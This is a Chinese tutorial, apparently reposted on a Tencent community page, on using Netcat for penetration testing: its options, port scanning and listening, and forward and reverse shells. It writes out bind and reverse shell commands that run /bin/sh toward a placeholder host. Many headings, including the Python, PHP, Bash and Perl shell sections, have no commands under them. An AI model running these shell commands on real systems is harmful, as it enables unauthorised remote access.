Kali Linux实战篇:Netcat“瑞士军刀”网络安全工具实战

前言

最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助!

Netcat简介

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

Netcat选项参数说明

功能说明:端口扫描、端口监听、远程文件传输、远程shell等等;

语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]

参  数:

-g 设置路由器跃程通信网关,最多可设置8个;

-G 设置来源路由指向器,其数值为4的倍数;

-h 在线帮助;

-i 设置时间间隔,以便传送信息及扫描通信端口;

-l 使用监听模式,管控传入的资料;

-n 直接使用IP地址,而不通过域名服务器;

-o 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;

-p 设置本地主机使用的通信端口;

-r 乱数指定本地与远端主机的通信端口;

-s 设置本地主机送出数据包的IP地址;

-u 使用UDP传输协议;

-v 显示指令执行过程;

-w 设置等待连线的时间;

-z 使用0输入/输出模式,只在扫描通信端口时使用。

Netcat简易使用

连接到远程主机

监听本地主机

端口扫描

扫描指定主机的单一端口是否开放

扫描指定主机的某个端口段的端口开放信息

扫描指定主机的某个UDP端口段,并且返回端口信息

扫描指定主机的端口段信息,并且设置超时时间为3秒

端口监听

监听本地端口

注:先设置监听(不能出现端口冲突),之后如果有外来访问则输出该详细信息到命令行

监听本地端口,并且将监听到的信息保存到指定的文件中

连接远程系统

之后可以运行HTTP请求

FTP匿名探测

文件传输

传输端:

接收端:

简易聊天

本地主机

命令:nc -l 8888

远程主机

命令:nc Targert_IP Targert_Port

蜜罐

作为蜜罐使用1:

命令:nc -L -p Port

注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止

作为蜜罐使用2:

命令:nc -L -p Port >log.txt

注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止,同时把结果输出到log.txt文件中,如果把“>”改为“>>”即追加到文件之后。

这一个命令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,但是自己可以去找找,这里只是想到了之前的这个使用,所以提出来简单介绍一下!

获取shell

简述:获取shell分为两种,一种是正向shell,一种是方向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell

正向shell

本地主机:

命令:nc Targert_IP Targert_Port

目标主机:

命令:nc -lvp Targert_Port -e /bin/sh

反向shell

本地主机:

命令:nc -lvp Target_Port

目标主机:

命令:nc Targert_IP Targert_Port -e /bin/sh

特殊情况——目标主机上没有Netcat,如何获取反向shell

在一般情况下,目标主机上一般都是不会有Netcat的,此时就需要使用其他替代的方法来实现反向链接达到攻击主机的目的,下面简单的介绍几种反向shell的设置。

python反向shell

目标主机端执行语句:

本地主机

目标主机

PHP反向shell

目标主机端执行语句:

本地主机:

目标主机:

Bash反向shell

目标主机端执行语句:

本地主机:

目标主机:

Perl反向shell

目标主机端执行语句:

本地主机

目标主机

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190622A0C5XO00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券